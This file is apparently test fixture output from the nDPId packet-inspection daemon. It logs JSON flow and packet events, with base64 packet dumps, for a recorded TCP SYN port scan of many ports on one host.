-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"synscan.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAs8c8AAC8GJ6OsEAAIQA2GNIzTTiXdU4MZAAAAAGACEADaZgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":650,"source":"synscan.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"synscan.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAs1WcAADIGQQusEAAIQA2GNIzT2TDdU4MZAAAAAGACDABTWwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":651,"source":"synscan.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"synscan.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAsusMAACYGZ6+sEAAIQA2GNIzTIGTdU4MZAAAAAGACDAAMKAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":652,"source":"synscan.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"synscan.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAsMsoAADoG26isEAAIQA2GNIzTJxHdU4MZAAAAAGACDAAFewAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":653,"source":"synscan.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"synscan.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsfjcAADIGmDusEAAIQA2GNIzTA\/HdU4MZAAAAAGACDAAomwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":654,"source":"synscan.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1455,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":654,"source":"synscan.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsIUEAADsG7DGsEAAIQA2GNIzTBa\/dU4MZAAAAAGACEAAi3QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":655,"source":"synscan.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":655,"source":"synscan.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsIGkAADsG7QmsEAAIQA2GNIzTI4PdU4MZAAAAAGACEAAFCQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":656,"source":"synscan.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"synscan.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAs8WwAADAGJwasEAAIQA2GNIzTBMDdU4MZAAAAAGACBAAvzAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":657,"source":"synscan.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"synscan.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAs4isAADYGMEesEAAIQA2GNIzTCE7dU4MZAAAAAGACDAAkPgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"synscan.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1277,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"synscan.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsa44AADEGq+SsEAAIQA2GNIzTBP3dU4MZAAAAAGACCAArjwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"synscan.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"synscan.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAse3cAADIGmvusEAAIQA2GNIzTF2TdU4MZAAAAAGACDAAVKAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":660,"source":"synscan.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"synscan.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsdjUAADcGmz2sEAAIQA2GNIzTBCLdU4MZAAAAAGACEAAkagAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":661,"source":"synscan.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1248,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"synscan.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsodUAADUGcZ2sEAAIQA2GNIzTBODdU4MZAAAAAGACCAArrAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"synscan.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"synscan.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsNa8AAC4G5MOsEAAIQA2GNIzTIzHdU4MZAAAAAGACDAAJWwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"synscan.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1185,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"synscan.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsa+sAACoGsoesEAAIQA2GNIzTBKHdU4MZAAAAAGACDAAn6wAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"synscan.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"synscan.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsTKAAADUGxtKsEAAIQA2GNIzT\/mndU4MZAAAAAGACCAAyIgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"synscan.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":212,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"synscan.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsqL8AADQGa7OsEAAIQA2GNIzTANTdU4MZAAAAAGACBAAzuAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"synscan.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1096,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"synscan.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsh6AAAC8GkdKsEAAIQA2GNIzTBEjdU4MZAAAAAGACEAAkRAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":667,"source":"synscan.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"synscan.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsYFoAACoGvhisEAAIQA2GNIzTHVjdU4MZAAAAAGACDAAPNAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"synscan.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5850,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"synscan.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsNFoAACYG7hisEAAIQA2GNIzTFtrdU4MZAAAAAGACDAAVsgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":669,"source":"synscan.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"synscan.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAshW4AADgGiwSsEAAIQA2GNIzTCEndU4MZAAAAAGACBAAsQwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":670,"source":"synscan.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2196,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"synscan.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsT2wAACwGzQasEAAIQA2GNIzTCJTdU4MZAAAAAGACBAAr+AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":671,"source":"synscan.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"synscan.pcap","alias":"nDPId-test","flow_id":662,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsQX8AAC0G2fOsEAAIQA2GNIzTDSfdU4MZAAAAAGACCAAjZQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":672,"source":"synscan.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"synscan.pcap","alias":"nDPId-test","flow_id":663,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsGTIAADgG90CsEAAIQA2GNIzTIyvdU4MZAAAAAGACBAARYQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"synscan.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"synscan.pcap","alias":"nDPId-test","flow_id":664,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsw2sAADAGVQesEAAIQA2GNIzTBLHdU4MZAAAAAGACBAAv2wAAAgQFtA=="} 